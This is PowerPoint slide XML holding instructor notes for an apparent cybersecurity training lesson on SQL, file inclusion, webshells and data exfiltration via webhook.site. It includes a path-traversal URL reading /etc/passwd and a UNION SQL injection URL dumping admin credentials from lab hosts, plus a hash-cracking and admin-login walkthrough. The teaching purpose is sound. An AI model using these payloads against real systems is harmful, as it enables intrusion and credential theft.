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507" r:id="rId2"/>
    <p:sldId id="1211" r:id="rId3"/>
    <p:sldId id="1213" r:id="rId4"/>
    <p:sldId id="1239" r:id="rId5"/>
    <p:sldId id="1240" r:id="rId6"/>
    <p:sldId id="1262" r:id="rId7"/>
    <p:sldId id="1263" r:id="rId8"/>
    <p:sldId id="1264" r:id="rId9"/>
    <p:sldId id="1265" r:id="rId10"/>
    <p:sldId id="1266" r:id="rId11"/>
    <p:sldId id="1267" r:id="rId12"/>
    <p:sldId id="1146" r:id="rId13"/>
    <p:sldId id="1268" r:id="rId14"/>
    <p:sldId id="1269" r:id="rId15"/>
    <p:sldId id="1270" r:id="rId16"/>
    <p:sldId id="1273" r:id="rId17"/>
    <p:sldId id="1271" r:id="rId18"/>
    <p:sldId id="1272" r:id="rId19"/>
    <p:sldId id="1274" r:id="rId20"/>
    <p:sldId id="1275" r:id="rId21"/>
    <p:sldId id="1115"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eke Sengstacke" initials="PS" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="f784b3bb772156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4006"/>
    <a:srgbClr val="D14828"/>
    <a:srgbClr val="418BC7"/>
    <a:srgbClr val="3598DB"/>
    <a:srgbClr val="1E4B87"/>
    <a:srgbClr val="F8B041"/>
    <a:srgbClr val="FDB072"/>
    <a:srgbClr val="7CA5C6"/>
    <a:srgbClr val="2DA5D5"/>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3" autoAdjust="0"/>
    <p:restoredTop sz="87538" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1786" y="58"/>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1/4/2019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1/4/2019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exploit was due to a vulnerability in the website’s SQL server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against SQL databases are common, and can be deadly. So, today’s lesson will let us get our bearings with the basics of SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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51128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15 minute break.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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084268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Point out that uploading and using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> required two steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Upload the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Request the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and send a command as a query parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that, when you request the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the server, it loads the file from the local filesystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that some vulnerable servers can also be "tricked" into loading the content of full webpages, hosted on other domains!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that this is called **Remote File Inclusion**, because it allows you to _include_ the contents of a _remotely_ hosted file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Use Firefox to navigate to: &lt;http://ptl-08a17b2b-81673f5e.libcurl.so/?page=intro.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that the URL includes the parameter: `page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intro.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that this instructs the web application to load the file called `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intro.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that you can request arbitrary files. If the server isn't configured properly, it will fulfill the request—even if it wasn't for a file it was meant to serve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Change the URL to: `http://ptl-08a17b2b-81673f5e.libcurl.so/?page=../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that this instructs the server to load the file at `../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that this dumps a list of all the users on the system!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ![](Images/lfi.png)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that this is called **local file inclusion (LFI)**, since it includes a _local_ file on the web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that you can also pass an arbitrary URL, which will load remote web content and dump it to the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Navigate to: &lt;http://ptl-08a17b2b-81673f5e.libcurl.so/?page=https://www.wikipedia.org/&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - In this case, you've included the contents of Wikipedia's home page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that **remote file inclusion (RFI)** can be used to include _malicious_ files that you've hosted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Emphasize that using an RFI to include a PHP file you host somewhere would trick this server into executing _your_ PHP (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that this can used for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Data exfiltration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Opening connections to an attacking machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Downloading files to the target server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Let students know that they'll explore the dangers RFI in the next exercise, before using it to deliver a cookie-stealing XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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562193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Stu_My_First_RFI</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30649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the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/Stu_My_First_RFI/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a: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260142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Explain that RFI is often used to inject code that sends data from the compromised host to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that this requires you to have a server receiving requests from the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that, in practice, you would set up your own HTTP server. But, for testing and learning purposes, we'll use a tool called Webhook, which provides a ready-made server that listens for requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Navigate to: &lt;https://webhook.site&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Click **Open in New Tab**, next to the unique URL provided midway down the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Close the new tab, and point out that Webhook has logged the request the browser sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that you can use this log to extract information from HTTP requests sent by compromised users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Let students know they'll get their feet wet with sending requests from malicious files uploaded via RFI in the next exercise, before constructing and delivering a cookie-stealing XSS to their classmates (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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913841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Stu_First_Steps_with_Webhook</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7035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the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_First_Steps_with_Webhook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a: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290532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Stu_First_Steps_with_Webhook</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77963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the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_Cookie_Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a: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80790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37190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Stu_SQL_Warm_Up</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20785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Review the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/Stu_SQL_Warm_Up/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t># SQL Warm-Up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>## Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Please navigate to the fiddle at: &lt;https://www.db-fiddle.com/f/upnxDj1JbZyQeG7BKNqAUL/0&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### SELECT WHERE with Conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Load the fiddle at the above link. Then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Select all users whose last name is `Doe`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `SELECT * WHERE last='Doe';`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Select all users whose last name is `Doe` _or_ `Competent`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `SELECT * WHERE last='Doe' OR `Competent';`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Select all users whose first name is `Jane` _and_ whose password is `asdf772nx`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `SELECT * WHERE last='Jane' AND password='asdf772nx';`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>The Queries below seem strange, but you'll use them in your SQL injections. For now, just try to understand why they produce the results they do, not why you'd write queries like this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- This is Query #4. What is the result? What does the OR clause do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>site_data.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE first='Jane' OR '1'='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- TODO: This is Query #5. What is the result? What does the AND clause do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>site_data.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE first='Jane' AND password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>uwasf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- TODO: This is Query #6. What is the result? What does the AND clause do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>site_data.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE first='Jane' OR '1'='1' -- AND password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>uwasf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>**Solutions**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The first query retrieves the record for `Jane Doe`. The `OR` clause just says: Do _not_ return a result of this condition is false. Since `'1'='1'` is always true, it doesn't change the result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The second query retrieves no record. This is what would happen if someone tried to log into Jane's account with the wrong password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The third query retrieves the record for Jane. This is the same as the first query, since the AND clause is commented out. This means it does nothing in this query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Let students know they'll see why strange queries like this are useful when you study Login Bypasses.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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5723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exploit was due to a vulnerability in the website’s SQL server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against SQL databases are common, and can be deadly. So, today’s lesson will let us get our bearings with the basics of SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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2421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 Remind students where they left off at the end of the previous class: With administrator access to the control panel of a vulnerable web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>#### SQL Injection Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Use Firefox to navigate to the vulnerable web application at: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/cat.php?id=2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Remind students that this application is vulnerable to SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Navigate to the following URL: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/cat.php?id=1%20UNION%20SELECT%201,concat(login,%27:%27,password),3,4%20FROM%20users;--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - The SQL injection is: `1 UNION SELECT 1,concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>login,':',password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>),3,4 FROM users;--`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this page contains the output of running a UNION-based SQL injection against the vulnerable database, which dumps the administrator's username and password hash: `admin` and `8efe310f9ab3efeae8d410a8e0166eb2`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that reversing this password hash is as simple as a Google search, which reveals that the password is `P4ssw0rd`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Demonstrate at: &lt;https://md5.gromweb.com/?md5=8efe310f9ab3efeae8d410a8e0166eb2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Navigate to the vulnerable application's login page: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/admin/login.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Login with the username `admin` and password `P4ssw0rd`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out that this gives you access to the administrator panel of the web application—from here, you can do anything the administrator can do, like delete photos and upload files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this gives you full control over whatever functionality the administrator panel exposes...But _not_ more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Emphasize that this means that compromising the web application does _not_ imply a full server takeover, nor necessarily full control of the web application—just the ability to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>whicever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> high-privileged actions the web application happens to expose to site admins.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that today's lesson will explore a common method used to turn administrator access to a web server into a tool for running commands on the host: File uploads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Navigate to: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/admin/index.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Point out and click the link to **Add a new picture**. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this functionality is intended to allow the site administrator to upload pictures to the photoblog—but that it can in fact be used to upload _arbitrary_ files, including code!</a:t>
